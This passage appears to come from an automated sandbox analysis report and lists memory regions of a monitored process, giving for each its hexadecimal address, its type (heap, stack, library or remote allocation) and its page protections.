D0000
|
heap
|
page read and write
|
||
|
38B000
|
heap
|
page read and write
|
||
|
4647000
|
heap
|
page read and write
|
||
|
2E0000
|
heap
|
page read and write
|
||
|
4110000
|
heap
|
page read and write
|
||
|
4651000
|
trusted library allocation
|
page read and write
|
||
|
23EE000
|
stack
|
page read and write | page guard
|
||
|
1D7B000
|
heap
|
page read and write
|
||
|
2DD5000
|
trusted library allocation
|
page read and write
|
||
|
37C000
|
heap
|
page read and write
|
||
|
7FE89BB0000
|
trusted library allocation
|
page read and write
|
||
|
3433000
|
heap
|
page read and write
|
||
|
3D04000
|
heap
|
page read and write
|
||
|
2801000
|
trusted library allocation
|
page read and write
|
||
|
3BBD000
|
heap
|
page read and write
|
||
|
383000
|
direct allocation
|
page read and write
|
||
|
242F000
|
stack
|
page read and write
|
||
|
196000
|
heap
|
page read and write
|
||
|
37E000
|
heap
|
page read and write
|
||
|
429000
|
heap
|
page read and write
|
||
|
22D0000
|
trusted library allocation
|
page execute read
|
||
|
22EB000
|
heap
|
page read and write
|
||
|
32D000
|
heap
|
page read and write
|
||
|
41F9000
|
heap
|
page read and write
|
||
|
1EE0000
|
heap
|
page read and write
|
||
|
313000
|
heap
|
page read and write
|
||
|
360000
|
trusted library allocation
|
page read and write
|
||
|
128000
|
heap
|
page read and write
|
||
|
3B8B000
|
stack
|
page read and write
|
||
|
429000
|
heap
|
page read and write
|
||
|
180000
|
trusted library allocation
|
page read and write
|
||
|
464000
|
heap
|
page read and write
|
||
|
7FE89A62000
|
trusted library allocation
|
page read and write
|
||
|
720000
|
heap
|
page read and write
|
||
|
3406000
|
heap
|
page read and write
|
||
|
1E20000
|
direct allocation
|
page read and write
|
||
|
446000
|
heap
|
page read and write
|
||
|
3860000
|
trusted library allocation
|
page read and write
|
||
|
1C84E000
|
stack
|
page read and write
|
||
|
497000
|
heap
|
page read and write
|
||
|
4F8000
|
heap
|
page read and write
|
||
|
2144000
|
trusted library allocation
|
page read and write
|
||
|
4FA000
|
heap
|
page read and write
|
||
|
1ABDE000
|
stack
|
page read and write
|
||
|
192000
|
heap
|
page read and write
|
||
|
41FB000
|
heap
|
page read and write
|
||
|
41DA000
|
heap
|
page read and write
|
||
|
593000
|
heap
|
page read and write
|
||
|
7FE89AD0000
|
trusted library allocation
|
page read and write
|
||
|
530000
|
heap
|
page read and write
|
||
|
4B41000
|
heap
|
page read and write
|
||
|
1B1AC000
|
stack
|
page read and write
|
||
|
8201000
|
trusted library allocation
|
page read and write
|
||
|
1B9000
|
heap
|
page read and write
|
||
|
358B000
|
stack
|
page read and write
|
||
|
1E0000
|
trusted library allocation
|
page read and write
|
||
|
4113000
|
heap
|
page read and write
|
||
|
3D0F000
|
heap
|
page read and write
|
||
|
24E6000
|
heap
|
page read and write
|
||
|
1E67000
|
direct allocation
|
page read and write
|
||
|
1A60F000
|
stack
|
page read and write
|
||
|
50E000
|
heap
|
page read and write
|
||
|
446000
|
heap
|
page read and write
|
||
|
2019000
|
trusted library allocation
|
page read and write
|
||
|
192000
|
heap
|
page read and write
|
||
|
7FE89A80000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E4F000
|
stack
|
page read and write
|
||
|
350000
|
heap
|
page read and write
|
||
|
51A000
|
heap
|
page read and write
|
||
|
1DE0000
|
direct allocation
|
page read and write
|
||
|
2F4000
|
heap
|
page read and write
|
||
|
24F1000
|
heap
|
page read and write
|
||
|
260000
|
heap
|
page read and write
|
||
|
3190000
|
heap
|
page read and write
|
||
|
522000
|
heap
|
page read and write
|
||
|
2D3000
|
heap
|
page read and write
|
||
|
2DA3000
|
trusted library allocation
|
page read and write
|
||
|
2EE0000
|
heap
|
page read and write
|
||
|
41D000
|
heap
|
page read and write
|
||
|
3BBC000
|
heap
|
page read and write
|
||
|
297E000
|
stack
|
page read and write
|
||
|
7FE89B20000
|
trusted library allocation
|
page read and write
|
||
|
2E00000
|
trusted library allocation
|
page read and write
|
||
|
199000
|
heap
|
page read and write
|
||
|
1F10000
|
heap
|
page read and write
|
||
|
2BE6000
|
heap
|
page read and write
|
||
|
160000
|
trusted library allocation
|
page read and write
|
||
|
238000
|
stack
|
page read and write
|
||
|
3CE9000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
106000
|
heap
|
page read and write
|
||
|
51A000
|
heap
|
page read and write
|
||
|
4ACA000
|
heap
|
page read and write
|
||
|
3B4000
|
heap
|
page read and write
|
||
|
2017000
|
trusted library allocation
|
page read and write
|
||
|
3CF3000
|
heap
|
page read and write
|
||
|
2BDB000
|
heap
|
page read and write
|
||
|
2BCE000
|
heap
|
page read and write
|
||
|
1BC0000
|
heap
|
page read and write
|
||
|
580000
|
heap
|
page read and write
|
||
|
2851000
|
trusted library allocation
|
page read and write
|
||
|
3D0F000
|
heap
|
page read and write
|
||
|
3B8000
|
heap
|
page read and write
|
||
|
7801000
|
trusted library allocation
|
page read and write
|
||
|
2B4000
|
heap
|
page read and write
|
||
|
121B1000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B40000
|
trusted library allocation
|
page read and write
|
||
|
1C1EA000
|
heap
|
page read and write
|
||
|
188000
|
heap
|
page read and write
|
||
|
32D0000
|
heap
|
page read and write
|
||
|
4ACE000
|
heap
|
page read and write
|
||
|
1AE5E000
|
stack
|
page read and write
|
||
|
7FE89A80000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AB15000
|
heap
|
page read and write
|
||
|
2BE6000
|
heap
|
page read and write
|
||
|
37E000
|
heap
|
page read and write
|
||
|
38C6000
|
heap
|
page read and write
|
||
|
344B000
|
heap
|
page read and write
|
||
|
2DAE000
|
trusted library allocation
|
page read and write
|
||
|
14F000
|
heap
|
page read and write
|
||
|
2DDC000
|
trusted library allocation
|
page read and write
|
||
|
3890000
|
heap
|
page read and write
|
||
|
3443000
|
heap
|
page read and write
|
||
|
1A70C000
|
stack
|
page read and write
|
||
|
1AA6C000
|
heap
|
page read and write
|
||
|
1F70000
|
remote allocation
|
page read and write
|
||
|
7FE89B30000
|
trusted library allocation
|
page read and write
|
||
|
41CE000
|
stack
|
page read and write
|
||
|
41A1000
|
heap
|
page read and write
|
||
|
234000
|
heap
|
page read and write
|
||
|
525000
|
heap
|
page read and write
|
||
|
1C1C5000
|
heap
|
page read and write
|
||
|
4507000
|
heap
|
page read and write
|
||
|
33D0000
|
heap
|
page read and write
|
||
|
4649000
|
heap
|
page read and write
|
||
|
1C1C2000
|
heap
|
page read and write
|
||
|
21F0000
|
heap
|
page execute and read and write
|
||
|
2DD7000
|
trusted library allocation
|
page read and write
|
||
|
60B000
|
heap
|
page read and write
|
||
|
3CFD000
|
heap
|
page read and write
|
||
|
3CEA000
|
heap
|
page read and write
|
||
|
4212000
|
heap
|
page read and write
|
||
|
1B030000
|
heap
|
page read and write
|
||
|
26B000
|
stack
|
page read and write
|
||
|
3CBA000
|
heap
|
page read and write
|
||
|
3CFD000
|
heap
|
page read and write
|
||
|
33D0000
|
heap
|
page read and write
|
||
|
1DD0000
|
heap
|
page read and write
|
||
|
3AF8000
|
trusted library allocation
|
page read and write
|
||
|
27D0000
|
heap
|
page read and write
|
||
|
2DD2000
|
trusted library allocation
|
page read and write
|
||
|
4214000
|
heap
|
page read and write
|
||
|
3CF3000
|
heap
|
page read and write
|
||
|
5CA000
|
heap
|
page read and write
|
||
|
7FE89BC0000
|
trusted library allocation
|
page read and write
|
||
|
525000
|
heap
|
page read and write
|
||
|
3426000
|
heap
|
page read and write
|
||
|
1AF6F000
|
stack
|
page read and write
|
||
|
215F000
|
stack
|
page read and write
|
||
|
1C206000
|
heap
|
page read and write
|
||
|
51A000
|
heap
|
page read and write
|
||
|
41FC000
|
heap
|
page read and write
|
||
|
4201000
|
heap
|
page read and write
|
||
|
6E01000
|
trusted library allocation
|
page read and write
|
||
|
33E6000
|
heap
|
page read and write
|
||
|
54D000
|
heap
|
page read and write
|
||
|
2BC2000
|
heap
|
page read and write
|
||
|
1A548000
|
stack
|
page read and write
|
||
|
38EE000
|
stack
|
page read and write
|
||
|
1E5D000
|
stack
|
page read and write
|
||
|
7FE89970000
|
trusted library allocation
|
page read and write
|
||
|
47F000
|
heap
|
page read and write
|
||
|
1B066000
|
heap
|
page read and write
|
||
|
3CAB000
|
heap
|
page read and write
|
||
|
7FE898D0000
|
trusted library allocation
|
page read and write
|
||
|
37A000
|
heap
|
page read and write
|
||
|
44E000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
7FE89B40000
|
trusted library allocation
|
page read and write
|
||
|
1D50000
|
heap
|
page read and write
|
||
|
390000
|
heap
|
page read and write
|
||
|
3D04000
|
heap
|
page read and write
|
||
|
17B000
|
heap
|
page read and write
|
||
|
2DCE000
|
trusted library allocation
|
page read and write
|
||
|
27BE000
|
trusted library allocation
|
page read and write
|
||
|
5C0000
|
heap
|
page read and write
|
||
|
37A000
|
heap
|
page read and write
|
||
|
3D0F000
|
heap
|
page read and write
|
||
|
570000
|
trusted library allocation
|
page read and write
|
||
|
37E000
|
heap
|
page read and write
|
||
|
419000
|
heap
|
page read and write
|
||
|
33E6000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
33FB000
|
heap
|
page read and write
|
||
|
3CFA000
|
heap
|
page read and write
|
||
|
7FE898C3000
|
trusted library allocation
|
page execute and read and write
|
||
|
347F000
|
trusted library allocation
|
page read and write
|
||
|
31F000
|
heap
|
page read and write
|
||
|
7FE89A60000
|
trusted library allocation
|
page read and write
|
||
|
2DDA000
|
trusted library allocation
|
page read and write
|
||
|
430000
|
heap
|
page read and write
|
||
|
192000
|
heap
|
page read and write
|
||
|
41D5000
|
heap
|
page read and write
|
||
|
4AB9000
|
heap
|
page read and write
|
||
|
3160000
|
trusted library allocation
|
page read and write
|
||
|
148000
|
heap
|
page read and write
|
||
|
2802000
|
trusted library allocation
|
page read and write
|
||
|
6451000
|
trusted library allocation
|
page read and write
|
||
|
3374000
|
heap
|
page read and write
|
||
|
463D000
|
heap
|
page read and write
|
||
|
3860000
|
trusted library allocation
|
page read and write
|
||
|
41D8000
|
heap
|
page read and write
|
||
|
2C4000
|
heap
|
page read and write
|
||
|
4002000
|
heap
|
page read and write
|
||
|
2DA3000
|
trusted library allocation
|
page read and write
|
||
|
175000
|
heap
|
page read and write
|
||
|
438000
|
heap
|
page read and write
|
||
|
37E000
|
heap
|
page read and write
|
||
|
2BDE000
|
heap
|
page read and write
|
||
|
4645000
|
heap
|
page read and write
|
||
|
4912000
|
heap
|
page read and write
|
||
|
4B3000
|
heap
|
page read and write
|
||
|
1C20000
|
heap
|
page read and write
|
||
|
41F9000
|
heap
|
page read and write
|
||
|
162000
|
heap
|
page read and write
|
||
|
3E0000
|
heap
|
page read and write
|
||
|
3D0C000
|
heap
|
page read and write
|
||
|
1F95000
|
heap
|
page read and write
|
||
|
4212000
|
heap
|
page read and write
|
||
|
3428000
|
heap
|
page read and write
|
||
|
25F0000
|
heap
|
page read and write
|
||
|
565000
|
heap
|
page read and write
|
||
|
3120000
|
heap
|
page read and write
|
||
|
505000
|
heap
|
page read and write
|
||
|
3433000
|
heap
|
page read and write
|
||
|
490000
|
heap
|
page read and write
|
||
|
1DF0000
|
direct allocation
|
page read and write
|
||
|
2DA5000
|
trusted library allocation
|
page read and write
|
||
|
122000
|
stack
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
7FE89AA2000
|
trusted library allocation
|
page read and write
|
||
|
4456000
|
heap
|
page read and write
|
||
|
3C01000
|
trusted library allocation
|
page read and write
|
||
|
20EF000
|
stack
|
page read and write
|
||
|
3CE9000
|
heap
|
page read and write
|
||
|
189000
|
heap
|
page read and write
|
||
|
18A000
|
heap
|
page read and write
|
||
|
1A440000
|
heap
|
page read and write
|
||
|
2BB000
|
heap
|
page read and write
|
||
|
5B1000
|
heap
|
page read and write
|
||
|
2B50000
|
heap
|
page read and write
|
||
|
27E3000
|
heap
|
page read and write
|
||
|
2F7000
|
heap
|
page read and write
|
||
|
3D0F000
|
heap
|
page read and write
|
||
|
21D8000
|
stack
|
page read and write
|
||
|
33B000
|
heap
|
page read and write
|
||
|
3CB4000
|
heap
|
page read and write
|
||
|
35DF000
|
stack
|
page read and write
|
||
|
12A000
|
heap
|
page read and write
|
||
|
150000
|
heap
|
page read and write
|
||
|
7FE89C20000
|
trusted library allocation
|
page read and write
|
||
|
41D7000
|
heap
|
page read and write
|
||
|
31FD000
|
trusted library allocation
|
page read and write
|
||
|
4AB1000
|
heap
|
page read and write
|
||
|
1D00000
|
heap
|
page read and write
|
||
|
2B9A000
|
heap
|
page read and write
|
||
|
24ED000
|
heap
|
page read and write
|
||
|
44C000
|
heap
|
page read and write
|
||
|
117000
|
heap
|
page read and write
|
||
|
464A000
|
heap
|
page read and write
|
||
|
1F1C000
|
stack
|
page read and write
|
||
|
37F000
|
heap
|
page read and write
|
||
|
421A000
|
heap
|
page read and write
|
||
|
1C888000
|
heap
|
page read and write
|
||
|
7FE899E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BDB000
|
heap
|
page read and write
|
||
|
3FE8000
|
heap
|
page read and write
|
||
|
192000
|
heap
|
page read and write
|
||
|
7FE89AE0000
|
trusted library allocation
|
page read and write
|
||
|
44E000
|
heap
|
page read and write
|
||
|
540000
|
heap
|
page read and write
|
||
|
3350000
|
heap
|
page read and write
|
||
|
46A0000
|
trusted library allocation
|
page read and write
|
||
|
1C130000
|
heap
|
page read and write
|
||
|
3A40000
|
trusted library allocation
|
page read and write
|
||
|
2BBA000
|
heap
|
page read and write
|
||
|
283A000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B20000
|
trusted library allocation
|
page read and write
|
||
|
508000
|
heap
|
page read and write
|
||
|
3CBF000
|
stack
|
page read and write
|
||
|
3B11000
|
heap
|
page read and write
|
||
|
320000
|
heap
|
page read and write
|
||
|
356000
|
heap
|
page read and write
|
||
|
122000
|
heap
|
page read and write
|
||
|
505000
|
heap
|
page read and write
|
||
|
54F000
|
heap
|
page read and write
|
||
|
3210000
|
trusted library allocation
|
page read and write
|
||
|
1B96000
|
heap
|
page read and write
|
||
|
3A0000
|
direct allocation
|
page read and write
|
||
|
263000
|
heap
|
page read and write
|
||
|
175000
|
heap
|
page read and write
|
||
|
383000
|
heap
|
page read and write
|
||
|
4002000
|
heap
|
page read and write
|
||
|
1D9B000
|
heap
|
page read and write
|
||
|
3CB6000
|
heap
|
page read and write
|
||
|
152000
|
heap
|
page read and write
|
||
|
549000
|
heap
|
page read and write
|
||
|
313000
|
heap
|
page read and write
|
||
|
2EF000
|
heap
|
page read and write
|
||
|
508000
|
heap
|
page read and write
|
||
|
2FB0000
|
trusted library allocation
|
page read and write
|
||
|
2DB2000
|
trusted library allocation
|
page read and write
|
||
|
3030000
|
trusted library allocation
|
page read and write
|
||
|
579000
|
heap
|
page read and write
|
||
|
1D65000
|
heap
|
page read and write
|
||
|
41D6000
|
heap
|
page read and write
|
||
|
3CF3000
|
heap
|
page read and write
|
||
|
1B60000
|
heap
|
page read and write
|
||
|
1CF0000
|
direct allocation
|
page read and write
|
||
|
52D000
|
heap
|
page read and write
|
||
|
4AB0000
|
heap
|
page read and write
|
||
|
39F000
|
heap
|
page read and write
|
||
|
1C22F000
|
heap
|
page read and write
|
||
|
44E000
|
heap
|
page read and write
|
||
|
1D30000
|
direct allocation
|
page read and write
|
||
|
2E30000
|
heap
|
page read and write
|
||
|
7FE89B70000
|
trusted library allocation
|
page read and write
|
||
|
2DC8000
|
trusted library allocation
|
page read and write
|
||
|
4107000
|
heap
|
page read and write
|
||
|
4AB2000
|
heap
|
page read and write
|
||
|
E2000
|
stack
|
page read and write
|
||
|
1ADDF000
|
stack
|
page read and write
|
||
|
132000
|
heap
|
page read and write
|
||
|
2BDB000
|
heap
|
page read and write
|
||
|
295F000
|
stack
|
page read and write
|
||
|
7FFFFF00000
|
trusted library allocation
|
page execute and read and write
|
||
|
3CB8000
|
heap
|
page read and write
|
||
|
229F000
|
heap
|
page read and write
|
||
|
421A000
|
heap
|
page read and write
|
||
|
260000
|
heap
|
page read and write
|
||
|
4B20000
|
heap
|
page read and write
|
||
|
2E9000
|
heap
|
page read and write
|
||
|
2E44000
|
heap
|
page read and write
|
||
|
4212000
|
heap
|
page read and write
|
||
|
2B7000
|
heap
|
page read and write
|
||
|
7FE89A7C000
|
trusted library allocation
|
page read and write
|
||
|
356000
|
heap
|
page read and write
|
||
|
196000
|
heap
|
page read and write
|
||
|
1A68E000
|
stack
|
page read and write
|
||
|
149000
|
heap
|
page read and write
|
||
|
3D04000
|
heap
|
page read and write
|
||
|
1D4B000
|
direct allocation
|
page read and write
|
||
|
44C000
|
heap
|
page read and write
|
||
|
1CE7B000
|
stack
|
page read and write
|
||
|
38D5000
|
heap
|
page read and write
|
||
|
1C85E000
|
heap
|
page read and write
|
||
|
4F3000
|
heap
|
page read and write
|
||
|
1AD8E000
|
stack
|
page read and write
|
||
|
2BA7000
|
heap
|
page read and write
|
||
|
4645000
|
heap
|
page read and write
|
||
|
2DB5000
|
trusted library allocation
|
page read and write
|
||
|
5C6000
|
heap
|
page read and write
|
||
|
1CA0000
|
heap
|
page read and write
|
||
|
3433000
|
heap
|
page read and write
|
||
|
2270000
|
heap
|
page read and write
|
||
|
3BA000
|
heap
|
page read and write
|
||
|
526000
|
heap
|
page read and write
|
||
|
4B21000
|
heap
|
page read and write
|
||
|
344B000
|
heap
|
page read and write
|
||
|
1AEEF000
|
stack
|
page read and write
|
||
|
184000
|
heap
|
page read and write
|
||
|
C0000
|
trusted library allocation
|
page read and write
|
||
|
279B000
|
stack
|
page read and write
|
||
|
455000
|
heap
|
page read and write
|
||
|
2AE000
|
heap
|
page read and write
|
||
|
342A000
|
stack
|
page read and write
|
||
|
2D0000
|
trusted library allocation
|
page read and write
|
||
|
2361000
|
heap
|
page read and write
|
||
|
2DB2000
|
trusted library allocation
|
page read and write
|
||
|
4601000
|
trusted library allocation
|
page read and write
|
||
|
2DAB000
|
trusted library allocation
|
page read and write
|
||
|
3CFA000
|
heap
|
page read and write
|
||
|
3A90000
|
heap
|
page read and write
|
||
|
1C242000
|
heap
|
page read and write
|
||
|
3CF7000
|
heap
|
page read and write
|
||
|
41C7000
|
heap
|
page read and write
|
||
|
22F5000
|
trusted library allocation
|
page read and write
|
||
|
462A000
|
heap
|
page read and write
|
||
|
7FE89980000
|
trusted library allocation
|
page execute and read and write
|
||
|
446D000
|
heap
|
page read and write
|
||
|
36F0000
|
trusted library allocation
|
page read and write
|
||
|
4B20000
|
heap
|
page read and write
|
||
|
427000
|
heap
|
page read and write
|
||
|
330000
|
heap
|
page read and write
|
||
|
3443000
|
heap
|
page read and write
|
||
|
16A000
|
heap
|
page read and write
|
||
|
3A45000
|
trusted library allocation
|
page read and write
|
||
|
175000
|
heap
|
page read and write
|
||
|
549000
|
heap
|
page read and write
|
||
|
48B0000
|
heap
|
page read and write
|
||
|
547000
|
heap
|
page read and write
|
||
|
4912000
|
heap
|
page read and write
|
||
|
27F6000
|
trusted library allocation
|
page read and write
|
||
|
3BB7000
|
heap
|
page read and write
|
||
|
137000
|
heap
|
page read and write
|
||
|
25F4000
|
heap
|
page read and write
|
||
|
59D000
|
heap
|
page read and write
|
||
|
14D000
|
heap
|
page read and write
|
||
|
1D60000
|
heap
|
page read and write
|
||
|
2BDF000
|
heap
|
page read and write
|
||
|
3CF0000
|
trusted library allocation
|
page read and write
|
||
|
3443000
|
heap
|
page read and write
|
||
|
18F000
|
trusted library allocation
|
page read and write
|
||
|
3B1D000
|
stack
|
page read and write
|
||
|
1F70000
|
remote allocation
|
page read and write
|
||
|
3A0000
|
heap
|
page read and write
|
||
|
1C71D000
|
stack
|
page read and write
|
||
|
3A0C000
|
stack
|
page read and write
|
||
|
41D000
|
heap
|
page read and write
|
||
|
4B21000
|
heap
|
page read and write
|
||
|
13F000
|
heap
|
page read and write
|
||
|
3450000
|
trusted library allocation
|
page read and write
|
||
|
12101000
|
trusted library allocation
|
page read and write
|
||
|
3F8B000
|
stack
|
page read and write
|
||
|
325000
|
heap
|
page read and write
|
||
|
3A2D000
|
trusted library allocation
|
page read and write
|
||
|
6401000
|
trusted library allocation
|
page read and write
|
||
|
565000
|
heap
|
page read and write
|
||
|
3376000
|
heap
|
page read and write
|
||
|
7FE89BF0000
|
trusted library allocation
|
page read and write
|
||
|
1FC6000
|
heap
|
page read and write
|
||
|
559000
|
heap
|
page read and write
|
||
|
33E5000
|
heap
|
page read and write
|
||
|
7FE89AF0000
|
trusted library allocation
|
page read and write
|
||
|
1B27C000
|
stack
|
page read and write
|
||
|
43A000
|
heap
|
page read and write
|
||
|
4ACA000
|
heap
|
page read and write
|
||
|
4497000
|
heap
|
page read and write
|
||
|
340000
|
direct allocation
|
page read and write
|
||
|
193000
|
heap
|
page read and write
|
||
|
3D0E000
|
heap
|
page read and write
|
||
|
2431000
|
trusted library allocation
|
page read and write
|
||
|
342E000
|
heap
|
page read and write
|
||
|
3428000
|
heap
|
page read and write
|
||
|
2181000
|
trusted library allocation
|
page read and write
|
||
|
3D0C000
|
heap
|
page read and write
|
||
|
29B0000
|
remote allocation
|
page read and write
|
||
|
307000
|
heap
|
page read and write
|
||
|
525000
|
heap
|
page read and write
|
||
|
525000
|
heap
|
page read and write
|
||
|
2BA9000
|
heap
|
page read and write
|
||
|
4202000
|
heap
|
page read and write
|
||
|
3CB3000
|
heap
|
page read and write
|
||
|
4B13000
|
heap
|
page read and write
|
||
|
3F6E000
|
stack
|
page read and write
|
||
|
54D000
|
heap
|
page read and write
|
||
|
72D000
|
heap
|
page read and write
|
||
|
335C000
|
heap
|
page read and write
|
||
|
4649000
|
heap
|
page read and write
|
||
|
1F26000
|
heap
|
page read and write
|
||
|
1B80000
|
heap
|
page read and write
|
||
|
2D1000
|
heap
|
page read and write
|
||
|
4B1C000
|
heap
|
page read and write
|
There are 1408 hidden memdumps, click here to show them.